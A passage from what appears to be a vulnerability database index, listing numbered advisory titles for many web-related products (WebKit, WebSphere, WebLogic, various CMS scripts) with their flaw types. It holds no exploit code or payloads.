Apple iTunes WebKit code execution variant 44 [65838] Apple iTunes WebKit code execution variant 43 [65837] Apple iTunes WebKit code execution variant 42 [65836] Apple iTunes WebKit code execution variant 41 [65835] Apple iTunes WebKit code execution variant 40 [65834] Apple iTunes WebKit code execution variant 39 [65833] Apple iTunes WebKit code execution variant 38 [65832] Apple iTunes WebKit code execution variant 37 [65831] Apple iTunes WebKit code execution variant 36 [65830] Apple iTunes WebKit code execution variant 35 [65829] Apple iTunes WebKit code execution variant 34 [65828] Apple iTunes WebKit code execution variant 33 [65827] Apple iTunes WebKit code execution variant 32 [65826] Apple iTunes WebKit code execution variant 31 [65825] Apple iTunes WebKit code execution variant 30 [65824] Apple iTunes WebKit code execution variant 29 [65823] Apple iTunes WebKit code execution variant 28 [65822] Apple iTunes WebKit code execution variant 27 [65821] Apple iTunes WebKit code execution variant 26 [65820] Apple iTunes WebKit code execution variant 25 [65819] Apple iTunes WebKit code execution variant 24 [65818] Apple iTunes WebKit code execution variant 23 [65817] Apple iTunes WebKit code execution variant 22 [65816] Apple iTunes WebKit code execution variant 21 [65815] Apple iTunes WebKit code execution variant 20 [65814] Apple iTunes WebKit code execution variant 19 [65813] Apple iTunes WebKit code execution variant 18 [65812] Apple iTunes WebKit code execution variant 17 [65811] Apple iTunes WebKit code execution variant 16 [65810] Apple iTunes WebKit code execution variant 15 [65809] Apple iTunes WebKit code execution variant 14 [65808] Apple iTunes WebKit code execution variant 13 [65807] Apple iTunes WebKit code execution variant 12 [65806] Apple iTunes WebKit code execution variant 11 [65805] Apple iTunes WebKit code execution variant 10 [65804] Apple iTunes WebKit code execution variant 9 [65803] Apple iTunes WebKit code execution variant 8 [65802] Apple iTunes WebKit code execution variant 7 [65801] Apple iTunes WebKit code execution variant 6 [65800] Apple iTunes WebKit code execution variant 5 [65799] Apple iTunes WebKit code execution variant 4 [65798] Apple iTunes WebKit code execution variant 3 [65797] Apple iTunes WebKit code execution variant 2 [65796] Apple iTunes WebKit code execution variant 1 [65767] IBM Tivoli Netcool/OMNIbus Web GUI SQL injection [65740] Google Chrome WebGL denial of service [65738] Google Chrome WebGL denial of service [65714] WebKit WebCore denial of service [65674] HP Web Jetadmin unspecified unauthorized access [65665] F-Secure Policy Manager WebReporting module cross-site scripting [65664] F-Secure Policy Manager WebReporting module path disclosure [65663] EDraw Office Viewer Component ActiveX control WebUrl buffer overflow [65659] Mutare Software Enabled VoiceMail interface cross-site request forgery [65621] Cisco TelePresence Multipoint Switch interface denial of service [65604] Cisco TelePresence Recording Server interface file upload [65577] DIY Web CMS multiple SQL injection [65576] DIY Web CMS login.asp cross-site scripting [65537] PIPI Player PIPIWebPlayer ActiveX control buffer overflow [65504] Intellicom NetBiter WebSCADA default password [65503] Intellicom NetBiter WebSCADA read.cgi code execution [65473] webERP InputSerialItemsFile.php File Upload [65436] Cisco Security Agent webagent.exe file upload [65396] Oracle Java SE and Java for Business Java Runtime Environment Java Webstart loader code execution [65388] F-Secure Internet Gatekeeper for Linux interface information disclosure [65357] Control Microsystems ClearSCADA interface information disclosure [65356] Control Microsystems ClearSCADA interface cross-site scripting [65274] WebAsyst Shop Script app parameter cross-site scripting [65218] HP Power Manager interface cross-site request forgery [65185] Multiple SMCD3G-CCR gateways interface cross-site request forgery [65174] Xerox WorkCentre Web server command execution [65160] Apache Tomcat HTML Manager interface cross-site scripting [65081] TinyWebGallery index.php directory traversal [65080] TinyWebGallery multiple parameters cross-site scripting [65077] Cisco WebEx Player ATP buffer overflow [65076] Cisco WebEx Player recording session buffer overflow [65075] Cisco WebEx Player ARF buffer overflow [65074] Cisco WebEx Player ARF buffer overflow [65073] Cisco WebEx Player ARF buffer overflow [65072] Cisco WebEx Player ARF buffer overflow [65063] Simple Web Content Management System item_delete.php security bypass [65062] Simple Web Content Management System item_delete.php SQL injection [65050] Apache CouchDB web-based administration UI cross-site scripting [65039] Weborf get_param_value() buffer overflow [65024] AB WEB CMS ab_gp_detail.php SQL injection [65023] AB WEB CMS ab_gp_detail.php cross-site scripting [65013] Lomtec ActiveWeb Professional EasyEdit.cfm file upload [64978] web@all 404.php cross-site scripting [64935] Oracle BEA WebLogic Server Plug-ins HTTP buffer overflow [64934] Oracle BEA WebLogic Server Plug-ins SSL buffer overflow [64890] IBM WebSphere Portal and Lotus Web Content Management unspecified information disclosure [64850] Linksys WRT54GC interface buffer overflow [64815] Sun Java System Communications Express Web Mail unauthorized access [64814] Sun Management Center Web console information disclosure [64812] Sun Convergence Webmail information disclosure [64783] Oracle Agile Web Client security bypass [64766] Oracle WebLogic Server Servlet Container unspecified [64765] Oracle WebLogic Server Node Manager code execution [64764] Oracle WebLogic Server Servlet Container unspecified [64737] IBM Tivoli Access Manager for e-business WebSEAL directory traversal [64697] Sybase EAServer Web services code execution [64685] MySQL HANDLER interface denial of service [64678] InduSoft Web Studio and Advantech Studio NTWebServer.exe buffer overflow [64658] Symantec Web Gateway USERNAME SQL injection [64628] IBM WebSphere MQ message header buffer overflow [64606] Cisco ASA WebVPN security bypass [64603] Cisco ASA emWEB denial of service [64561] Webform module for Drupal unspecified SQL injection [64558] WebSphere Application Server console servlet information disclosure [64554] WebSphere Application Server Web Container cross-site scripting [64550] IBM WebSphere MQ message buffer overflow [64482] Microsoft Internet Explorer ReleaseInterface() code execution [64477] Symantec PGP Universal Web Messenger retryURL phishing [64471] IBM Tivoli Access Manager for e-business WebSEAL denial of service [64440] IBM Rational ClearQuest Web client security bypass [64408] QuickPHP Web Server index.php file download [64388] Mozilla Firefox WebSockets unspecified [64377] HotWeb Rentals default.asp SQL injection [64374] Yektaweb Academic Web Tools browse.php cross-site scripting [64361] QuickPHP Web Server HTTP directory traversal [64327] Embedthis Appweb unspecified cross-site scripting [64301] web@all action.php cross-site request forgery [64258] Mitel Audio and Web Conferencing (AWC) xml command execution [64222] Ad Manager Pro website-page.php SQL injection [64215] WebAdmin and U-Mail URI information disclosure [64212] Webmail index.php cross-site scripting [64158] Opera Web page information disclosure [64052] Meeting Manager WebexUCFObject ActiveX control dynamic-linked library (atucfobj.dll) code execution [64031] Google Chrome web worker denial of service [63984] ManageEngine EventLog Analyzer management interface cross-site scripting [63981] iSpot and ClearSpot webmain.cgi cross-site request forgery [63979] LiteSpeed Web Server Null buffer overflow [63961] Google Website Optimizer Control Script cross-site scripting [63950] RealNetworks Helix Server interface cross-site request forgery [63808] QtWeb Browser dynamic-linked library (wintab32.dll) code execution [63769] HP Palm webOS Contacts Application cross-site scripting [63725] IceWarp Server webmail/basic/ cross-site scripting [63687] HotWeb Rentals resorts.asp SQL injection [63670] Palm Pre webOS Contacts unauthorized access [63652] Google Chrome WebM video support denial of service [63640] WebSphere Service Registry and Repository EJB security bypass [63565] Microsoft Windows Consent User Interface privilege escalation [63515] Kerio Control Web Filter component unspecified [63479] Linux Kernel shm interface information disclosure [63467] Micronetsoft RV Dealer Website serach.asp SQL injection [63434] webApp.secure Content-Length denial of service [63433] TinyWebGallery multiple scripts cross-site scripting [63432] TinyWebGallery multiple parameters cross-site scripting [63406] WebSphere Commerce RunTimeProfileCacheCmdImpl class information disclosure [63348] Apple Safari WebSockets code execution [63343] WebRCSdiff viewver.php file include [63297] openEngine website.php cross-site scripting [63283] Aficio Web Image monitor cross-site scripting [63264] Camtron CMNC-200 IP Camera interface security bypass [63242] Web Host cmsdetail.php SQL injection [63241] Webmatic index.php SQL injection [63156] SilverStripe interfaces cross-site request forgery [63153] WeBid active_auctions.php file include [63152] WeBID confirm.php cross-site scripting [63147] IBM WebSphere MQ FDC denial of service [63140] IBM Omnifind administrative interface buffer overflow [63114] IBM WebSphere MQ .NET password information disclosure [63102] Novell GroupWise WebPublisher cross-site scripting [63101] Novell GroupWise HTTP interface code execution [63092] Novell GroupWise WebAccess Agent and the Document Viewer Agent directory traversal [62976] CMS WebManager-Pro index.php cross-site scripting [62952] WebSphere Commerce sample store pages cross-site scripting [62951] WebSphere Commerce Organization Admin Console JSPs SQL injection [62950] WebSphere Application Server JAX-WS request denial of service [62949] WebSphere Application Server Administrative Console cross-site request forgery [62948] WebSphere Application Server Administrative Console cross-site scripting [62947] WebSphere Application Server Administrative Console cross-site scripting [62936] Webmedia Explorer desc cross-site scripting [62918] IBM WebSphere Portal SemanticTagService.js cross-site scripting [62830] Weborf HTTP denial of service [62826] HP LoadRunner Web Tours denial of service [62820] Palm Pre webOS camera application file overwrite [62819] Palm Pre webOS Service API code execution [62818] Palm Pre webOS Doc Viewer code execution [62802] Microsoft Forefront Unified Access Gateway Web monitor cross-site scripting [62669] Google Chrome Web sockets denial of service [62662] sNews website_title parameter cross-site scripting [62580] OpenConnect webvpn information disclosure [62564] Attachmate Reflection for the Web unspecified cross-site scripting [62522] Oracle WebLogic Server Node Manager file include [62511] Oracle Java SE and Java for Business Java Web Start unspecified variant 1 [62505] Oracle Java SE and Java for Business Java Web Start unspecified [62488] Wiki Web Help updateprofile.php cross-site request forgery [62475] Oracle Sun Products Oracle iPlanet Web Server (Sun Java System Web Server) WebDAV unspecified [62465] Oracle Sun Products Oracle iPlanet Web Server (Sun Java System Web Server) Administration unspecified [62464] Oracle Sun Products Oracle iPlanet Web Server (Sun Java System Web Server) Administration unspecified [62462] Oracle Sun Products Sun Convergence 1, Sun Java Communications Suite 7 Webmail unspecified [62461] Oracle Sun Products Oracle Communications Messaging Server (Sun Java System Messaging Server) Webmail unspecified [62460] Oracle Sun Products Oracle Communications Messaging Server (Sun Java System Messaging Server) Web Mail unspecified [62360] Xweblog arsiv.asp SQL injection [62359] Xweblog oku.asp SQL injection [62258] T-dah Uebimiau Webmail index.php file include [62240] Blue Coat ProxySG user interface cross-site scripting [62236] Subversion WebDAV module security bypass [62219] Intellicom NetBiter WebSCADA read.cgi file upload [62218] Intellicom NetBiter WebSCADA read.cgi information disclosure [62217] Intellicom NetBiter WebSCADA read.cgi directory traversal [62197] web2ldap unspecified cross-site scripting [62183] webSPELL unspecified mail relay [62179] webSPELL unspecified SQL injection [62132] webSPELL webspell_settings.php SQL injection [62131] webSPELL staticID parameter SQL injection [62130] webSPELL asearch.php SQL injection [62120] Horde Groupware Webmail icon_browser.php cross-site request forgery [62119] Horde Groupware Webmail icon_browser.php cross-site scripting [62059] Horde IMP Webmail Client fm_id cross-site scripting [61976] RSA Authentication Agent for Web directory traversal [61906] E-Commerce Webshop index.php SQL injection [61890] IBM WebSphere Application Server administration console denial of service [61881] NitroSecurity NitroView Enterprise Security Manager interface privilege escalation [61825] AXIGEN Mail Server Ajax WebMail cross-site scripting [61797] Free Discussion Forums App_Web_wngcbiby.dll security bypass [61778] IBM Proventia Network Mail Security System interface cross-site request forgery [61750] Symphony CMS fields[website] cross-site scripting [61650] Weborf URL directory traversal [61636] Microsoft Exchange Server Outlook Web Access cross-site request forgery [61619] MicroNetSoft Rental Property Management Website detail.asp SQL injection [61611] Micronetsoft RV Dealer Website detail.asp SQL injection [61593] CMS WebManager-Pro c.php SQL injection [61568] Google Chrome WebSockets code execution [61567] Google Chrome WebSockets denial of service [61505] Web Ideas Web Shop Standard index.php SQL injection [61466] Wiccle Web Builder post_text parameter cross-site scripting [61435] IBM WebSphere Application Server Timestamp element weak security [61400] Valarsoft Webmatic user editing script cross-site request forgery [61373] GFI WebMonitor proxy cross-site scripting [61328] Cisco WebEx Player ARF buffer overflow [61244] WebKit Geolocation.cpp unspecified [61200] WebKit geolocation events code execution [61199] WebKit WebCore::toAlphabetic() code execution [61198] WebKit unspecified information dislcosure [61197] Ezyweb CMS insert.image.php file upload [61196] Ezyweb CMS loginvalid.php SQL injection [61182] i-Web Suite default.asp SQL injection [61181] i-Web Suite default.asp cross-site scripting [61144] Weblinks component for Joomla! itemid parameter SQL injection [61134] Palm Pre webOS multiple unspecified [61133] Palm Pre webOS vCard code execution [61110] ServletExec administration interface security bypass [61059] Webkit PDFs (webkitpdf) extension for TYPO3 unspecified SQL injection [61058] Webkit PDFs (webkitpdf) extension for TYPO3 unspecified command execution [61053] Cisco Unified Wireless Network (UWN) Solution WEBAUTH_REQD state security bypass [61050] Cisco Unified Wireless Network (UWN) Solution virtual interface denial of service [61012] PHP-Nuke Web_Links module url parameter SQL injection [60994] Amlib NetOpacs webquery.dll buffer overflow [60986] IBM WebSphere Service Registry and Repository searchterm cross-site scripting [60890] SUSE WebYaST key security bypass [60889] PMSoftware Simple Web Server header denial of service [60879] QtDemoBrowser webview.cpp cross-site scripting [60878] kwebkitpart webkitpart.cpp cross-site scripting [60873] APT Webshop System modules.php SQL injection [60768] JBoss Enterprise SOA Platform web-console security bypass [60729] Nessus Web Server plugin for Nessus feed method information disclosure [60726] Nessus Web Server plugin for Nessus unspecified cross-site scripting [60670] Apple Mac OS X webdav_mount() denial of service [60658] Wing FTP Server Web client information disclosure [60638] IBM WebSphere MQ disk space denial of service [60633] Pre Web Host login SQL injection [60604] LILDBI-WEB uploader.php file upload [60586] WebKit WebSocketHandshake::readServerHandshake code execution [60576] WebCalendar multiple unspecifed cross-site scripting [60574] WebPress id_num_mod parameter cross-site scripting [60573] MyWebFTP index.php SQL injection [60570] ATutor interface cross-site request forgery [60567] Cisco Content Delivery System Cisco Internet Streamer web server directory traversal [60561] Microsoft Exchange Server Outlook Web Access cross-site request forgery [60551] Multiple HiWeb Wiesbaden Auktions products cafe.php SQL injection [60538] SAP J2EE Engine Core Navigator Interface cross-site scripting [60531] Mozilla Firefox, Thunderbird, and SeaMonkey Web Worker information disclosure [60519] Asidus WebWizard index.php SQL injection [60420] Novell GroupWise WebAccess component buffer overflow [60419] Novell GroupWise WebAccess component HTTP header injection [60418] Novell GroupWise WebAccess component cross-site scripting [60412] Juniper IVE OS interface welcome.cgi cross-site scripting [60404] Novell GroupWise WebAccess component unspecified cross-site scripting [60403] Novell GroupWise WebAccess component message cross-site scripting [60402] Novell GroupWise WebAccess component unspecified information disclosure [60362] Asterisk Recording Interface recording_popup.php cross-site scripting [60361] Asterisk Recording Interface page.ampusers.php cross-site request forgery [60360] Asterisk Recording Interface index.php path disclosure [60359] Asterisk Recording Interface index.php denial of service [60358] Asterisk Recording Interface index.php file include [60333] Oracle Sun Products Sun Java System Web Proxy Server component unspecified. [60308] Oracle Fusion Middleware WebLogic Server component security bypass [60273] Groupmax World Wide Web Desktop products unspecified cross-site scripting [60262] Web_Links module for PHP-Nuke description SQL injection [60252] Frog CMS administrative interface cross-site request forgery [60251] Orbis CMS interface cross-site request forgery [60124] Wiki Web Help revert.php cross-site scripting [60123] Wiki Web Help uploadimage.php file upload [60100] Wiki Web Help getpage.php SQL injection [60077] WorksForWeb iLister listing script action parameter file include [60070] BrotherScripts Recipe Website recipedetail.php SQL injection [60044] Google Chrome WebGL code execution [60023] SasCam Webcam Server ActiveX control buffer overflow [60020] Sun Java System Web Server admin denial of service [60018] IBM WebSphere MQ Subject DN spoofing [60012] Cisco ASA WebVPN portal cross-site scripting [59983] InterScan Web Security Virtual Appliance login_account_add_modify.jsp xss [59934] webERP UserSettings.php cross-site request forgery [59931] WebsiteBaker add.php file include [59930] WebsiteBaker settings2.php file include [59929] WebsiteBaker details.php code parameter file include [59926] WebsiteBaker details.php file include [59924] WebsiteBaker Template details.php directory traversal [59922] WebsiteBaker details.php directory traversal [59921] WebsiteBaker sections.php SQL injection [59919] WebsiteBaker settings2.php SQL injection [59917] WebsiteBaker add.php SQL injection [59916] WebsiteBaker details.php SQL injection [59915] WebsiteBaker save_field.php cross-site scripting [59914] WebsiteBaker details.php cross-site scripting [59911] WebsiteBaker index.php cross-site scripting [59903] WebDM CMS cont_form.php SQL injection [59880] EJBCA Admin interface cross-site scripting [59850] Cisco ASA interface response splitting [59823] Lois Software WebDB index.php SQL injection [59767] WebKit IFRAME information disclosure [59728] 2daybiz Web Template Software costumize.php SQL injection [59727] 2daybiz Web Template Software memberlogin.php cross-site scripting [59726] 2daybiz Web Template Software category.php cross-site scripting [59714] Weborf unicode header denial of service [59703] Trend Micro InterScan Web Security Virtual Appliance uihelper command execution [59692] Trend Micro InterScan Web Security Virtual Appliance filename file upload [59691] Trend Micro InterScan Web Security Virtual Appliance pkg_name file download [59690] Trend Micro InterScan Web Security Virtual Appliance exportname directory traversal [59647] WebSphere Application Server Administration Console cross-site scripting [59646] WebSphere Application Server Administration Console cross-site scripting [59642] Getaphpsite Webring service category.php SQL injection [59636] Apple iOS WebKit spoofing [59625] HP OpenView Network Node Manager ovwebsnmpsrv.exe buffer overflow [59620] Bizweb component for Joomla! index.php cross-site scripting [59609] IBM WebSphere ILOG JRules multiple cross-site scripting [59575] WebsiteBaker CMS add.php cross-site request forgery [59573] Spring Framework WebappClassLoader code execution [59562] H264WebCam GET denial of service [59545] Moodle weblib.php cross-site scripting [59508] Apple iTunes WebKit unspecified variant 3 [59507] Apple iTunes WebKit unspecified variant 2 [59506] Apple iTunes WebKit unspecified variant 1 [59502] SAP J2EE Engine Core telnet interface weak security [59487] IISWorks ASPWebMail Webmail.mdb information disclosure [59478] Webvolume Restaurant Listing TypeSearch.asp SQL injection [59476] Webvolume Business Classified Listing Typesearch.asp SQL injection [59470] eWebquiz Quiztype SQL injection [59467] Apple Mac OS X Ruby WEBrick cross-site scripting [59440] Joke Website Script search.php cross-site scripting [59439] Joke Website Script search.php SQL Injection [59396] VU Web Visitor Analyst login page SQL injection [59385] LiteSpeed Web Server information disclosure [59362] Webmedia Explorer folder.class.php cross-site request forgery [59361] Webmedia Explorer folder.class.php cross-site scripting [59349] Miniweb index.php module parameter file include [59348] Miniweb index.php module parameter SQL Injection [59342] Snom VoIP Phone Firmware interface security bypass [59341] IgnitionSuite Web CMS WebDmailUnsubscribe.aspx security bypass [59293] CA PSFormX and WebScan ActiveX controls code execution [59291] Web Wiz Forums new_reply_form.asp SQL Injection [59279] Juniper IVE OS interface cross-site scripting [59249] HP OpenView Network Node Manager ovwebsnmpsrv.exe buffer overflow [59236] Pre Web Host celeron.php SQL injection [59219] Apple Safari WebKit CSS :visited pseudo-class information disclosure [59218] Apple Safari WebKit HTML tables code execution [59214] Apple Safari WebKit fonts code execution [59205] Apple Safari WebKit text node code execution [59204] Apple Safari WebKit HTTP redirect information disclosure [59203] Apple Safari WebKit textarea element cross-site scripting [59202] Apple Safari WebKit HTML document subtree code execution [59201] Apple Safari WebKit Node.normalize method code execution [59200] Apple Safari WebKit DOM Range objects code execution [59199] Apple Safari WebKit malformed URLs cross-site scripting [59198] Apple Safari WebKit execCommand security bypass [59197] Apple Safari WebKit drag and drop code execution [59196] Apple Safari WebKit src attribute cross-site scripting [59195] Apple Safari WebKit :after pseudo-selector code execution [59194] Apple Safari WebKit SVG image pattern information disclosure [59193] Apple Safari WebKit libxml contexts code execution [59192] Apple Safari WebKit removeChild DOM method code execution [59191] Apple Safari WebKit NTLM weak security [59190] Apple Safari WebKit hover event code execution [59189] Apple Safari WebKit IRC port blacklist weak security [59188] Apple Safari WebKit non-default TCP port weak security [59187] Apple Safari WebKit Referer header information disclosure [59186] Apple Safari WebKit vertical positioning code execution [59185] Apple Safari WebKit CSS run-ins code execution [59184] Apple Safari WebKit nested SVG use element code execution [59183] Apple Safari WebKit multiple SVG use elements code execution [59182] Apple Safari WebKit SVG use element code execution [59181] Apple Safari WebKit SVG document event listener code execution [59180] Apple Safari WebKit :first-letter pseudo-element code execution [59179] Apple Safari WebKit caption element code execution [59178] Apple Safari WebKit form input element code execution [59177] Apple Safari WebKit ordered list insertions code execution [59176] Apple Safari WebKit layout changes code execution [59175] Apple Safari WebKit container elements code execution [59174] Apple Safari WebKit DOM constructor object cross-site scripting [59173] Apple Safari WebKit keyboard focus weak security [59172] Apple Safari WebKit HTML document fragment cross-site scripting [59171] Apple Safari WebKit CSS information disclosure [59170] Apple Safari WebKit HTML buttons code execution [59169] Apple Safari WebKit local storage and web SQL database information disclosure [59168] Apple Safari WebKit UTF-7 encoding cross-site scripting [59167] Apple Safari WebKit dragging or pasting selection cross-site scripting [59166] Apple Safari WebKit links and images information disclosure [59149] WebBiblio Subject Gateway System help.php file include [59135] Weborf Range header denial of service [59120] QtWeb marquee tag denial of service [59118] Seti@home Web Monitor seti.php file include [59085] Websense via security bypass [59054] Accoria Rock Web Server authcfg.cgi format string [59052] Accoria Rock Web Server loadstatic.cgi directory traversal [59050] Accoria Rock Web Server multiple scripts cross-site scripting [59026] osCommerce Visitor Web Stats module SQL Injection [59019] GoAhead WebServer HTTP source disclosure [58989] Marketing Web Design verfoto.php cross-site scripting [58987] Marketing Web Design verfoto.php SQL injection [58986] Aim Web Design newsarticle.php SQL injection [58985] Aim Web Design id cross-site scripting [58984] Webiz videos.php file upload [58983] Webiz index.php SQL Injection [58981] 360 Web Manager CMS IDM parameter cross-site scripting [58980] Realtor Web Site System E-Commerce idfestival SQL injection [58956] Cisco DPC2100R2 interface default password [58935] Home FTP Server interface cross-site request forgery [58933] 360 Web Manager CMS IDSM parameter SQL injection [58928] Easy Address Book WebServer users_admin.php cross-site request forgery [58892] Webby HTTP GET buffer overflow [58877] NITRO Web Gallery index.php SQL injection [58873] Web 5000 page_show.php SQL Injection [58872] Webit CMS main.php SQL Injection [58836] Interuse Website Builder index2php SQL Injection [58835] Microsoft Outlook Web Access (OWA) id cross-site scripting [58828] Prowebassociates CMS template_event SQL Injection [58813] Webperformance Ecommerce shop.php SQL Injection [58810] eWebeditor upload.asp file upload [58780] Kingsoft WebShield KAVSafe.sys privilege escalation [58748] webYourPhotos index.php file include [58716] McAfee Email Gateway systemWebAdminConfig.do security bypass [58689] Hitachi Web Server SSL CRL security bypass [58688] Hitachi Web Server SSL denial of service [58683] QtWeb document.write() denial of service [58677] WebJaxe administration.php SQL injection [58672] Webloader izle.php SQL injection [58642] Abyss Web Server password cross-site request forgery [58636] WebSAM DeploymentManager packets denial of service [58608] Consona CRM Suite SdcWebSecureBase code execution [58607] Consona CRM Suite SdcWebSecureBase security bypass [58606] Consona CRM Suite SdcWebSecureBase security bypass [58600] Web Design Solution index.php SQL injection [58562] Zervit Webserver index.html directory traversal [58561] Zervit Webserver index.html source code disclosure [58560] MiniWebsvr HTTP directory traversal [58557] WebSphere Application Server Web Container information disclosure [58556] WebSphere Application Server Web Container denial of service [58555] WebSphere Application Server Deployment Manager and nodeagent denial of service [58554] WebSphere Application Server WebServices PKIPath and PKCS#7 token type security bypass [58522] Movable Type administrative user interface cross-site scripting [58520] e-webtech fixed_page.php SQL Injection [58465] e-webtech new.asp SQL injection [58400] Apple Safari WebKit.dll denial of service [58373] Webprodz editar.php SQL injection [58366] Consona CRM Suite Web server cross-site scripting [58354] Slooze PHP Web Photo Album slooze.php command execution [58324] IBM WebSphere Application Server trace log information disclosure [58323] IBM WebSphere Application Server debugging mode information disclosure [58219] Webmoney Advisor ActiveX control denial of service [58214] gpEasy CMS admin interface cross-site request forgery [58207] webMathematica MSP script informaiton disclosure [58196] Apple Safari WebKit blink tag denial of service [58169] Apache Tomcat Web Application Manager / Host Manager cross-site request forgery [58148] Red Hat JBoss Enterprise Application Platform Web Consoleinformation disclosure [58141] Wing FTP Server Web Client directory traversal [58119] Webessence comment_do.php SQL injection [58118] Webessence media_new_do.php file upload [58117] Webessence oembed.php cross-site scripting [58101] Palm Pre WebOS SMS client cross-site scripting [58100] Memorial Web Site Script admin security bypass [58099] Memorial Web Site Script index.php security bypass [58098] Memorial Web Site Script show_memorial.php SQL injection [58082] NKInFoWeb loadorder.php SQL injection [58039] IBM WebSphere MQ channel control data denial of service [58032] Webmoney WMI component for Joomla! index.php file include [57963] WebAsyst Shop-Script multiple cross-site scripting [57962] WebAsyst Shop-Script multiple parameters SQL injection [57961] WebAsyst Shop-Script sub directory traversal [57950] N/X Web CMS nxheader.inc.php file include [57949] N/X Web CMS path file include [57913] WebAdmin index.php file upload [57905] Iomega Home Media Network Hard Drive smbwebclient.php authentication bypass [57902] Imperva SecureSphere Web Application Firewall and Database Firewall requests security bypass [57812] Cisco Secure Desktop CSDWebInstaller ActiveX control code execution [57806] Java Web Start ActiveX control instantiation [57805] Multi Profit Websites page.php file include [57802] Webessence configure.php cross-site request forgery [57801] Webessence media.php cross-site scripting [57726] Oracle Collaboration Suite User Interface Components unspecified [57685] com_webtv component for Joomla! controller parameter file include [57648] com_webeecomment component for Joomla! controller parameter file include [57623] Miniature Java Web Server path disclosure [57622] Miniature Java Web Server phishing [57621] Miniature Java Web Server unspecified directory traversal [57613] IBM WebSphere Portal login unspecified [57587] Sun Java System Web Server WebDAV LOCK command information disclosure [57547] uTorrent Web UI denial of service [57524] Java Mini Web Server directory traversal [57523] Java Mini Web Server cross-site scripting [57482] webERPcustomer component for Joomla! file include [57468] WebKit JavaScript phishing [57441] Weblinks component for Joomla! index.php SQL injection [57411] Faweb2 admin.php security bypass [57398] Apache ActiveMQ Web console cross-site request forgery [57368] Oracle Java SE and Java for Business Java Web Start and Java Plug-in unspecified variant 3 [57361] Oracle Java SE and Java for Business Java Web Start and Java Plug-in unspecified variant 2 [57353] Oracle Java SE and Java for Business Java Web Start and Java Plug-in unspecified [57312] Multiple VMware products Web requests spoofing [57311] Multiple VMware products Web Access cross-site scripting [57241] Open Web Analytics mw_plugin.php file include [57240] Open Web Analytics index.php file include [57236] OmniWeb TCP security bypass [57232] Uebimiau Webmail multiple directories information disclosure [57231] Uebimiau Webmail multiple scripts path disclosure [57230] Uebimiau Webmail lid cross-site scripting [57201] WeBAM CaptchaSecurityImages.php denial of service [57200] WeBAM CaptchaSecurityImages.php security bypass [57185] Websphere Application Server wsadmin scripting information disclosure [57182] WebSphere Application Server ORB client denial of service [57171] Website Baker backup-sql.php information disclosure [57164] WebSphere Application Server Administration Console cross-site scripting [57139] Cisco IOS interface queue denial of service [57095] Webmatic search cross-site scripting [57094] Webmatic multiple parameters cross-site scripting [57060] WebMaid CMS cContactus.php file include [57059] WebMaid CMS index.php file include [57042] Googel Chrome WebKit JavaScript objects integer overflow [57017] IBM DB2 Content Manager DB2 Content Manager Web services unspecified [56955] Web Wiz Forums multiple cross-site request forgery [56954] Embedthis Appweb waitCallback() denial of service [56851] Eros Webkatalog start.php SQL injection [56780] Uebimiau Webmail email information disclosure [56764] Perforce P4Web session hijackng [56697] CSS Web Installer and Command On Demand ActiveX control buffer overflow [56668] CUPS file descriptors-handling interface denial of service [56650] WebTrends domain name cross-site scripting [56647] WebLogExpert domain name cross-site scripting [56646] WebExpert User-Agent HTTP header cross-site scripting [56633] Sun ONE (aka iPlanet) Web Server log-preview security bypass [56632] Sun ONE (aka iPlanet) Web Server iPlanet Log Analyzer cross-site scripting [56544] Website Baker print_error() security bypass [56531] WebAdministrator Lite download.php SQL injection [56527] WebKit CSSSelector() denial of service [56473] IBM WebSphere Portal Portlet Palette cross-site scripting [56388] LiteSpeed Web Server confMgr.php cross-site request forgery [56368] Trendnet TV-IP201 GoAhead WebServer directory traversal [56360] Mozilla Firefox and SeaMonkey Web Workers code execution [56348] Intuitive-websites form.php SQL injection [56339] Cisco ASA 5500 WebVPN DTLS denial of service [56295] Dillo Web browser cookie URL information disclosure [56290] Webee Comments component for Joomla! BBCode cross-site scripting [56289] Webee Comments component for Joomla! index.php SQL injection [56254] WebHtmlEditor component for NetAdvantage InitialDirectory directory traversal [56246] Accellion File Transfer Appliance (FTA) web_client_user_guide.html [56245] SAP NetWeaver WebDynpro runtime cross-site scripting [56227] RSA SecurID IISWebAgentIF.dll cross-site scripting [56188] Cisco IronPort Encryption Appliance WebSafe information disclosure [56185] WebSphere Application Server Requires SSL option weak security [56169] Gefest Web Home Server HTTP directory traversal [56168] JDownloader JDExternInterface.java command execution [56090] IBM WebSphere Commerce encryption scheme weak security [56089] IBM WebSphere Commerce encryption key weak security [56084] WebCalendar unspecified cross-site request forgery [56083] WebCalendar users.php cross-site scripting [56059] Sun ONE Messaging Server and iPlanet Messaging Server Webmail cross-site scripting [56057] Sun ONE Messaging Server and iPlanet Messaging Server Webmail unauthorized access [56021] eWebeditor login.asp security bypass [56020] eWebeditor ewebeditor.mdb information disclosure [56019] eWebeditor upload.asp file upload [56014] crownweb page.cfm SQL injection [55998] TantumWeb PhpCatalog unspecified cross-site request forgery [55964] Sun Java System Web Server method token denial of service [55959] Redatam+SP WebServer RpWebEngine.exe/PortalAction path disclosure [55958] Redatam+SP WebServer RpWebEngine.exe/PortalAction cross-site scripting [55880] Google Chrome Webkit pop-up security bypass [55858] Zeus Web Server DNS spoofing [55845] Oracle WebLogic Server Node manager command execution [55828] Xerox WorkCentre Network Controller and Web Server unauthorized access [55821] VP-ASP Shopping Cart websess SQL injection [55815] eWebeditor upload.asp directory traversal [55812] Sun Java System Web Server WebDAV format string [55792] Sun Java System Web Server Authorization: Digest header buffer overflow [55781] SAP Web Application Server ITS buffer overflow [55764] Sun Java System Web Server WebDAV buffer overflow [55761] EasySiteNetwork Jokes Complete Website multiple cross-site scripting [55744] WebSphere Service Registry and Repository (WSRR) configuration property security bypass [55733] Zeus Web Server unspecified cross-site scripting [55728] Zeus Web Server SSLv2 packets buffer overflow [55727] Web Server Creator index.php file include [55726] Web Server Creator index.php cross-site scripting [55725] Web Server Creator customize.php directory traversal [55719] Sun Java System Web Server TRACE buffer overflow [55682] WebCalenderC3 unspecified cross-site scripting [55681] WebCalenderC3 unspecified file include [55677] TrendMicro Web-Deployment ActiveX Control code execution [55663] IBM Lotus Web Content Management login page cross-site scripting [55652] Jetty WebApp JSP Snoop page cross-site scripting [55628] HP Web Jetadmin SQL server unauthorized access [55582] Oracle BEA WebLogic Server data manipulation [55581] Oracle BEA WebLogic Server unspecified denial of service [55579] Oracle BEA WebLogic Server unspecified denial of service [55578] Oracle BEA WebLogic Server information disclosure [55548] IBM Lotus Domino Web Access unspecified [55533] Ruby WEBrick command execution [55528] Sun Java System Web Server memory address code execution [55527] Sun Java System Web 